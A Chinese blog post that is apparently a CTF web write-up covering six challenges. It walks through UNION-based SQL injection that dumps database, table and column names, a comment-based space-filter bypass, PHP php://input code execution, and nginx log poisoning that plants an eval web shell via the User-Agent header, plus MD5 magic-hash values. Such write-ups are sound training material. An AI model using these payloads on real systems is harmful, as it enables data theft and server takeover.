ZTJL3

最新推荐文章于 2024-07-17 14:25:47 发布
最新推荐文章于 2024-07-17 14:25:47 发布
阅读量46 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75005708/article/details/133604954
版权

web1

源代码base64解码就是答案

web2

登录框,万能密码试一下

admin or 1=1#      密码随便输,条件是恒成立的,但是这个页面没有回应

admin' or 1=1#     加上单引号就页面就有了新的变化。

应该是单引号字符型注入

 顺序为:获取库名,获取表名,获取列名,获取数据

获取注入点,运用联合查询

admin' or 1=1 union select 1,2,3#

 从这里我们知道该数据库有三列,并且注入点是第二列

admin' or 1=1 union select 1,2,3,4#  页面不会有变化

库名

admin' or 1=1 union select 1,database(),3#

库名就是web2了

表名

admin' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'#

table_name是查询表名需要的命令和schema_name查询库名的用法相同。tables是从information_schema库的tables表中获取,后面的where table_schema='web2'是table表中获取web2的表的内容。也就是做了一定的限制,就只获取web2库中的表名。flag 和user

就要获得列

admin' or union select 1,group_concat(column_name),3 from information_schema.columns  where table_schema='web2' and table_name='flag'#

column_name就是查询列名的意思

 可以看到flag表中有一个flag列。

内容获取

admin' or 1=1 union select 1,flag, 3 from flag#

 web3

找到include,应该是文件包含漏洞,抓包看看

 php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。

加上系统命令,读取文件    <?php system('ls')?>

 接着读取,看到结果了。

 web4

打开页面和上面一题是一样的,照着操作一下,出现报错

 但是根据返回包知道是nginx:

默认nginx日志是:/var/log/nginx/access.log,可以看到记录了请求

包含日志文件,查看日志文件的信息,可以看到日志文件中保存了网站的访问记录,包括HTTP请求行,Referer,User-Agent等HTTP请求的信息

 

传参: 

 ?url=/var/log/nginx/access.log

#这个地址是存放日志文件的,可以进行文件注入一句话

Burp Suite抓包,在User-Agent后面写个🐎

<?php eval($_POST['a'])?>

 蚁剑连接,看到flag

web5

 发现要求v1必须是字符串,v2必须是数字,并且对v1和v2的md5弱相等,也就是==,只比较字符串开头是否相等,那么就需要找到两个md5开头相等的即可。

QNKCDZO的md5是0e830400451993494058024219903391

240610708的md5是0e462097431906509019562988736854

 web6

尝试一下简单的万密,但是没有什么发现,应该是出现过滤了

 先绕过空格,/**/代替空格,可以,说明过滤了空格。

和web2差不多

注入点在2

admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#

 

 admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3#

得到数据库名为web2

 查表

admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#

 查询flag表的字段

admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#

 

查看flag字段中的内容

admin'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#

 这题和web2差不多,只是过滤了空格,在每条查询语句加上/**/绕过空格就可以了。

芝诺的乌龟M
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ZTJL2
qq_75005708的博客
10-05 80
抓包看看使用本地,抓包后修改就可以了,再次访问新的地址就可以了后面第二种使用脚本就可以了。
ZTJL1
qq_75005708的博客
10-05 172
查看PHP回到页面访问php,访问结果如下前面还比较好理解给出用户名和密码,但是后面就出现一个函数,我们应该要绕过它,接着往下看一下,它需要admin=admin,然后就passwd=wllm,如果可以满足这个条件,就可以拿到flag了,现在关键的问题就是我们要绕过函数。__wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行程序调用反序列化方法时,会自动执行__weakup()函数payloads:4:"wllm";
ZTJL4
qq_75005708的博客
10-08 45
下载下来并没有什么发现,应该爆破压缩包,用AAPR不行,ziperello也不可以查了之后才是需要修复文件,用zipcenop修复了之后就可以了。密码也就不用了。前提是我们需要把压缩包和jar文件放在同一个目录下,cmd命令进入到当前目录下就可以了这个工具也就是修复zip伪加密文件,修复成功之后就不需要密码了。然后java -jar ZipCenOp.jar r lm.zip(lm.zip为需要处理的文件)出现下面这个页面就说明文件修复成功了。
查杀我这辈子有幸遇到的第一个Linux病毒 (by quqi99)
技术并艺术着
08-17 1992
作者:张华 发表于:2021-08-17 版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息及本版权声明 问题 本人有一个腾讯虚机,昨天忽然ssh不上去了,控制台重启之后就又上去了,所以也就过去了。 可是今天又遇到了同样情况,不能总重启啊,得好好研究一下怎么回事了。 关闭云镜 使用top命令看到有个叫什么YunJing的进程,搜索一番后通过下列命令删除。 sudo /usr/local/qcloud/stargate/admin/uninstall.sh sudo /usr/loca
【服务器管理】Ubuntu的一次惊心动魄的查杀挖矿病毒的经历:病毒伪装成python
陈艺荣
01-15 9689
本文讲解了笔者在2022年1月份进行挖矿病毒杀毒的完整过程!
linux系统中挖矿病毒
杭州吉网-运维日记
01-13 653
原创作者:运维工程师 谢晋 linux系统中挖矿病毒错误信息解决问题 错误信息 客户这边说某台虚拟机CPU突然暴增,用完了整个宿主机CPU资源 可以看到CPU使用确实很高 登录系统查看CPU使用情况 使用top查看CPU使用情况 # top 可以看到kdevtmpfsi进程,该进程明显是挖矿病毒进程 解决问题 如果直接kill掉kdevtmpfsi程序后续还会反复运行,所以要一次停掉他相关进程 打印出所有进程 # ps aux 可以看到kdevtmpfsi进程和他的守护进程kinsi
Linux Unix.Trojan.Elknot (Linux.BackDoor.Gates.5)木马清理
热门推荐
liukeforever的专栏
08-14 1万+
被黑后, 向外疯狂发包,造成网络瘫痪
Fall back to translate ‘用户中心‘ key with ‘zh‘ locale.
Ama_Lee的博客
07-12 3712
一般情况下是没有定义’xxxx’字段对应的翻译还有一种问题是你定义了此字段以及对应的所有语言,'XXXX’已经是你要翻译成的文字,这种情况出现的原因大概率是在不同的地方翻译了两次,也就是调用了两次$t(‘xxxx’)进行语言转换。...
aspose.words -> word文档内容动态编辑
不想懂得Zenith
10-16 1389
一. 导入maven依赖 1. 获取aspose-word-18.6-jdk16.jar; 2. 导入本地仓库; mvn install:install-file -DgroupId=com.aspose -DartifactId=aspose-words -Dversion=18.8 -Dpackaging=jar -Dfile=D:/aspose-words-18.6-jdk16.jar 3. pom文件中引入坐标. <dependency> <groupI..
PostgreSQL 中如何解决因大量并发删除和插入操作导致的索引抖动?
技术笔记
07-17 676
索引抖动是 PostgreSQL 中一个常见的问题,它会对数据库的性能产生严重的影响。通过采用批量操作、分区表、索引优化和调整数据库参数等方法,我们可以有效地解决索引抖动问题,提高数据库的性能和稳定性。在实际应用中,我们应该根据具体情况选择合适的解决方案,并不断地进行优化和调整,以满足业务的需求。解决索引抖动问题就像是一场战斗,我们需要根据敌人(问题)的特点和弱点,选择合适的武器(解决方案),并灵活运用战术(优化方法),才能取得最终的胜利。
国产精品ORM框架-SqlSugar详解 SqlSugar初识 附案例源码 云草桑 专题一
cao919的专栏Net
07-13 769
国产精品ORM框架-SqlSugar详解 1、SqlSugar初识 2、开始实操 3、增删改操作 4、进阶功能 5优美的表达式、仓储、UnitOfWork、DbContext、AOP `代码先行,先有代码,然后有数据库,只关注业务,业务中的对象如果需要就直接创建实体,对应的数。简单易用、功能齐全、高性能、轻量级、服务齐全、官网教程文档、有专业技术支持一天18小时。支持 完整的SAAS一套应用 跨库查询 、租户分库 、租户分表 和 租户数据隔离。数据库的结构完全由代码来决定,数据库表--主键、自增,字段类型。
MySQL 进阶(三)【SQL 优化】
梦想是动物管理员
07-13 1269
MySQL SQL 优化
SQL Server详细使用教程(包含启动SQL server服务、建立数据库、建表的详细操作) 非常适合初学者
hackeroink的博客
07-15 954
本文主要详细介绍SQL server2019的简单使用,以《数据库系统概论(第5版)》的第79页—第80页为例,详细介绍如何使用SQL server2019这款数据库软件,包括启动SQL server服务,建立数据库(学生—课程模式S-T),建立课程表等,内容比较简单,容易理解,适合广大初学者了解SQL server的简单使用。不会涉及到复杂的语法知识,如果有也会详细解释的!下文标红的字请重点关注一下!本文的需要建表的数据如下:2.Course课程号Cno课程名Cname先行课Cpno学分。
NoSql选择题解
2301_79659699的博客
07-16 592
5. (单选题, 3分)MongoDB是一种NoSQL数据库,具体地说,是( )存储数据库。13. (单选题, 3分)CAP理论是NoSQL理论的基础,下列性质不属于CAP的是( )。7. (单选题, 3分)CAP理论是NoSQL理论的基础,下列性质不属于CAP的是( )。11. (单选题, 3分)下列关于NoSQL数据库和关系型数据库的比较,不正确的是( )。8. (单选题, 3分)于NoSQL数据库和关系数据库,下列说法不正确的是( )。6. (单选题, 3分)NoSQL数据库是指( )数据存储系统。
PostgreSQL 中如何解决因大量并发插入导致的主键冲突?
技术笔记
07-16 963
在 PostgreSQL 中,解决因大量并发插入导致的主键冲突问题是一个重要的任务。我们可以通过使用唯一索引、序列、批量插入与事务处理、分区表和优化业务逻辑等方法来避免主键冲突的发生。这些方法各有优缺点,我们需要根据实际情况选择合适的解决方案。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
sql server 练习题5
m0_67688142的博客
07-13 1124
VALUES (101, '2024-05-01 14:30:00', '2024-05-01 15:45:00', 250.99), -- 处理时长1小时15分钟。(102, '2024-05-02 09:00:00', '2024-05-02 10:00:00', 120.50), -- 处理时长1小时。我们想要查询每位员工的工龄(以年为单位)。-- 两周前的分享活动。VALUES (101, 'Login', DATEADD(DAY, -3, GETDATE())), -- 三天前的登录活动。
怎样在 PostgreSQL 中优化对大表的并发读取操作?
技术笔记
07-15 925
在 PostgreSQL 中,大表通常是指包含大量数据的表。这些表可能有数百万、数千万甚至数十亿条记录。当我们处理这样的大表时,查询操作可能会变得非常缓慢,特别是在并发读取的情况下。并发读取操作是指多个进程或线程同时从数据库中读取数据的操作。在实际应用中,并发读取操作是非常常见的,例如多个用户同时查询一个报表或者多个系统同时获取数据进行分析。优化 PostgreSQL 中对大表的并发读取操作是一个综合性的任务,需要我们从多个方面入手。
PostgreSQL 中如何解决因频繁的小事务导致的性能下降?
技术笔记
07-13 1056
这样可以减少事务的数量,降低系统的开销。例如,在一个电商系统中,如果每次用户添加一个商品到购物车都被设计为一个单独的事务,而不是在一定时间内批量处理,那么就会产生大量的小事务。对于一些非关键的、对实时性要求不高的操作,可以将其放入异步任务队列中,在后台进行处理,避免阻塞主事务的执行。以上只是一些常见的解决方法,实际情况可能更加复杂,需要综合考虑应用程序的架构、业务需求和数据库的特点来制定最适合的解决方案。比如,发送订单确认邮件这样的操作,就可以在事务完成后,将任务放入异步队列,由专门的工作进程在后台处理。
【论文速读】| TCSR-SQL:面向表内容感知的自检索文本到SQL方法
最新发布
m0_73736695的博客
07-17 654
本文提出了一种面向表内容感知的自检索文本到SQL(TCSR-SQL)方法。该方法利用LLM的上下文学习能力,从问题中提取数据内容关键词并推断可能相关的数据库模式,通过模糊搜索数据库生成初始SQL,并在多轮生成-执行-修正过程中不断优化,最终生成精确的SQL。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值